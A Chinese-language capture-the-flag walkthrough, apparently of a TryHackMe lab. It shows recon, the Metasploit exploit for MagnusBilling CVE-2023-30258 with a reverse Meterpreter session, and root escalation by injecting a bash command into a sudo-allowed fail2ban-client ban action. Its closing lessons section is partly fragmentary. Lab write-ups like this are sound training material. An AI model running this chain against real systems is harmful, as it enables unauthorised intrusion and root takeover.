关于利用CVE-2023-30258渗透Billing room并通过fail2ban配置错误进行权限提升的详细演练
作者: Aditya Bhatt | 开源贡献者
在本攻略中,我们将全力攻破 Billing 房间,展示一个脆弱的 MagnusBilling 实例、一个诱人的未授权 RCE(CVE-2023-30258)以及一个喊着“提权我吧”的 fail2ban sudo 配置错误。
这个房间完美融合了自动化利用与创造性权限提升,让我们亲手体验隐藏在 VoIP 计费软件中的真实漏洞。 我们将从初始侦察一路走到Root Shell,附带完整 PoC、评论和 🗿 风格。
部署机器后,首先映入眼帘的就像一个配置错误的防火墙:
http://<machine_IP>/mbilling/
这就是 MagnusBilling 登录页面。仅此一点就足以触发警报——你知道即将迎来一些美味 CVE 的表演。
我们先用终极侦察组合:
nmap -A -sV -p- 10.10.115.173
🧠 发现结果:
/mbilling/ 下接下来用 Gobuster 进行暴力扫描:
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
🧠 发现结果:
然后我们检查网站的 robots.txt 看看有什么料:
User-agent: *
Disallow: /mbilling/
嗯……想把它藏起来只会让我们更想要它 😈
快速 netcat 测试确认其响应为:
Response: Error
Message: Missing action in request
这进一步确认:后端是 MagnusBilling,并且该端口与 Asterisk Call Manager 相关联。是时候施展我们的黑暗法术了 🧙
漏洞:MagnusBilling 中的未认证远程代码执行 模块:
exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
启动 Metasploit:
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
然后检查要求:
show options
然后设置以下参数:
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run
几秒钟后……砰。 我们拿到了 Meterpreter 会话!
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64
尝试生成 TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
我们开始向上遍历:
cd ..
cd ..
直到找到:
cd /home/magnus
cat user.txt
不错!但还没完。我们需要 root,而 Magnus 正在向我们耳语秘密。
让我们检查可以用 sudo 运行哪些命令:
sudo -l
结果:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
现在这可是 🔥。我们可以滥用 fail2ban-client,通过封禁操作以 root 身份执行命令。
让我们重启 fail2ban:
sudo /usr/bin/fail2ban-client restart
然后注入命令来窃取 root 标志:
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"
触发封禁(从而执行命令):
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
然后:
cat /tmp/root.txt
成功获得 Root。就像个大佬。 🗿🔥
robots.txt、深挖奇怪端口。fail2ban-client)同样危险。这个盒子完美平衡了自动化利用和手动后渗透创造力。 从 MagnusBilling RCE 到 fail2ban-rooting,它为渗透测试者的播放列表奏响了所有正确的音符 🎧🎯
无论你是想提升自我的新手,还是收集旗子的老手——这都是必攻之选。
下次见, 保持危险。保持好奇。保持威严。 🗿
| 🔎 阶段 | 💥 行动/使用的工具 |
|---|
| 初始访问 | 使用 Nmap + Gobuster 发现 /mbilling 门户和 5038 端口 |
| 侦察发现 | MagnusBilling CMS + Asterisk Call Manager |
| 漏洞利用 | 通过 Metasploit 利用 CVE-2023-30258 → 获得 Meterpreter shell |
| 枚举 | 找到 /home/magnus/user.txt |
| 权限提升 | 滥用 fail2ban-client 的 sudo NOPASSWD → 以 root 身份执行 RCE |
| Root 标志 | 通过 fail2ban payload 注入获取 /root/root.txt |